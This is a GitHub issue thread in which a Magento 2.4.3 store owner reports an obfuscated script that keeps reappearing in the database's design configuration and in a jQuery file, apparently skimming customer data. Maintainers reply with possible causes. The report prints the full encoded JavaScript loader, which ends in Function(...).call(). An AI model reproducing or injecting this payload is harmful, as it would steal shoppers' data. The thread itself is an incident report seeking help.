New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Auto add malicious script in magento database from unknown source #38706
Comments
Hi @Bilalyounas1234. Thank you for your report.
Join Magento Community Engineering Slack and ask your questions in #github channel. |
@Bilalyounas1234 what version of Magento are you using? |
In short, either your site is repeatedly hacked and being exploited or you've missed some code they've left around as a backdoor. |
Hi @engcom-Hotel. Thank you for working on this issue.
|
Hello @Bilalyounas1234, This doesn’t seem like the Magento vulnerability. This could be due to the following reasons:
Thanks |
The magento version is 2.4.3 |
The site is repeatedly hacked from last 6 months We update the vendor some time ago as well we also update the third party extension |
Hello @Bilalyounas1234, Have you tried to fix the reasons mentioned here in this #38706 (comment)? Thanks |
Hi community,
We have been facing an issue for the last 4 to 5 months a malicious script is added to Magento coreconfigdata table related to design entries from an unknown source we removed it so many times but it again comes into the table after 2 or 3 days we unable to identify the source who is responsible for adding this script
<script> var o62634 = "1lj31sj36k79707m6s6k4n7f7k6s6s7b4k737l764070767l746l7h7e547875707j76796s7054536o7978545e75707m7l7879707l7m5e5b4k766m727l6s785c7c84757l746m536o6l7h745c7l4k7c84757l746m545e5d746s6s766k7h6m737f7h75767a6s74796p7l7j797d7f6s7276796s707f73757k7d79767k76705e534i7l4n7e7l7077767a5252547j7e7l7h744070767l746l7h7e546k79707m6s6k4n7f7k6s6s7b53587l4n7k79707m545e7j7e797j7b5e587875707j76796s70547l536o6k79707m6s6k4n7f6s747h7j7e7l6r6r747l717579747l547r5e7c71757l746m5e585e447h777l70766s7f4a7a7l7j7b6s75764m7c734m7d6s7m7l7e4m71756s767l5e80587875707j76796s70547l5876586s536o7978547j7573766s7d7l744d7h767h4k6k79707m6s6k4n7j7573766s7d7l744d7h767h587l7d7h797e4k7j7573766s7d7l744d7h767h4n7l7d7h797e585e75707m7l7879707l7m5e4k4k766m727l6s785c7l7d7h797e5252547l7d7h797e4k764n77757l73764c7d7h797e53587h7m7m747l73734k764n7k797e7e797077487m7m747l73735453585e75707m7l7879707l7m5e5b4k766m727l6s785c7h7m7m747l7373525270757e7e5b4k7h7m7m747l737352527h7m7m747l73734n7j79766m536o6l7h745c7h4k7l545e5d746s6s766k7h6m737f7h75767a6s74796p7l7j797d7f6s7276796s707f7j7j7f70757d7k7l745e534n6l7h7e545358744k7l545e5d746s6s766k7h6m737f7h75767a6s74796p7l7j797d7f6s7276796s707f7l6n7279747h76796s705e534n6l7h7e545358794k7l545e5d746s6s766k7h6m737f7h75767a6s74796p7l7j797d7f6s7276796s707f7l6n7279747h76796s707f6m745e534n6l7h7e545358704k7l545e5d746s6s766k7h6m737f7h75767a6s74796p7l7j797d7f6s7276796s707f7j7j7f7j797m5e534n6l7h7e54534i7978547h525274525279525270536o6l7h745c734k516o5e707h7d7l5e4j5e51587m4k515e585e6l7h7e757l5e4j5e51587j4k515e6q585158754k5e7r5e5573555e7a6s73765e557m557m6s7j757d7l70764n888745557j4i786s74546n5c79705c75554k73555e7h777l70765e557m55707h6l79777h766s744n75737l7448777l7076557j5875554k73555e75737l74707h7d7l5e557m55547l7d7h797e6r6r5e5e53557j587h7m7m747l7373537978545e7875707j76796s705e5b4k766m727l6s785c7h7m7m747l73737r6n80537978545e7376747l7l765e5b4k6n5375554k516o5e707h7d7l5e4j5e51556n55515e585e6l7h7e757l5e4j5e51557h7m7m747l73737r6n80557j4i7l7e737l5c786s74546m5c79705c7h7m7m747l73734n7376747l7l765375554k73555e7376747l7l767r5e556m555e805e557m557h7m7m747l73734n7376747l7l767r6m80557j4i75554k73555e727h6m7d7l70767r7j7j7f70757d7k7l74805e557m557h557j5875554k73555e727h6m7d7l70767r7j7j7f7j797m805e557m5570557j5875554k73555e727h6m7d7l70767r7j7j7f7l6n727f7d6s70767a805e557m5574557j58754k5475554k73555e727h6m7d7l70767r7j7j7f7l6n727f6m7l7h74805e557m5579557j534n747l727e7h7j7l544m407m4m77585e7f797m5e534n737e797j7l544p58574o53555e805e586k79707m6s6k4n7f6s747h7j7e7l4k4o4i6l7h745c7d4k7875707j76796s70547l536o6l7h745c76586s587h4k7k766s7h547l707j6s7m7l8887404a6s7d726s707l7076547l535358744k5e5e4i786s7454764k4p4i764l7h4n7e7l7077767a4i765555536s4k4r4s55544r4h55544o4r4f7g7h7r76804n7j7a7h744a6s7m7l4876544p53537g4o4r4o535874554k8676747970774n78746s7d4a7a7h744a6s7m7l546s534i747l767574705c746q5475534i737l7689797d7l6s7576547875707j76796s7054536o7l4n7h7c7h6n546o75747e4j7m6s7j757d7l70764n88874558766m727l4j5e726s73765e587m7h767h896m727l4j5e767l6n765e587m7h767h4j6o736s75747j7l4j5e727h6m7d7l7076737f737m7b5e5871756s767l446s7m7l4j5e7j7a7l7j7b6s75765e587d74797m4j5e87854f48894r504f434b424h435e587j6s7d724j5e7d7l73737h777l73587k7576766s70735e587j7e797l70767f797m4j5e48894d7s4g7f4c4a3s7a5778757m7l737s6s507b6p4q783r8986824o726p757n4a8650407c7s44715043427m87424e7a84874q876n6m7h786n4q4g414r78854q4f4q7n767d7e84837p7q7c8879487h7l5e587j7h74764a7a7l7j7b86757d4d7h767h4j7d6q6q536q584s4p4p536q6q6q536q53536q6q584o7l4q534i";var u48928=29;var k81320=o62634;var h1446=k81320.split("j3"),r91161=parseInt(h1446<0],29),q95337=parseInt(h1446[1],29);var c26982=[];for(var m18405=0;m18405=2){c26982.push(h1446[2].substring(m18405,m184052));}var k81320="";for(var g63966=0;c26982.length>g63966;g63966)k81320+=String.fromCharCode(((parseInt(c26982[g63966],u48928)-r91161)^q95337)-r91161);Function(k81320).call(); </script>The script which is added to the table is below
By using this script someone is stealing our data related to customers.
WAF is also enabled on our server and working well. we also contacted sucuri.net but were unable to identify the source.
It would be appreciated if you could guide the steps to identify the source.
Thanks in advance
When you decode this code it will become a script and some time it also add in the jquery file
No response
No response
The text was updated successfully, but these errors were encountered: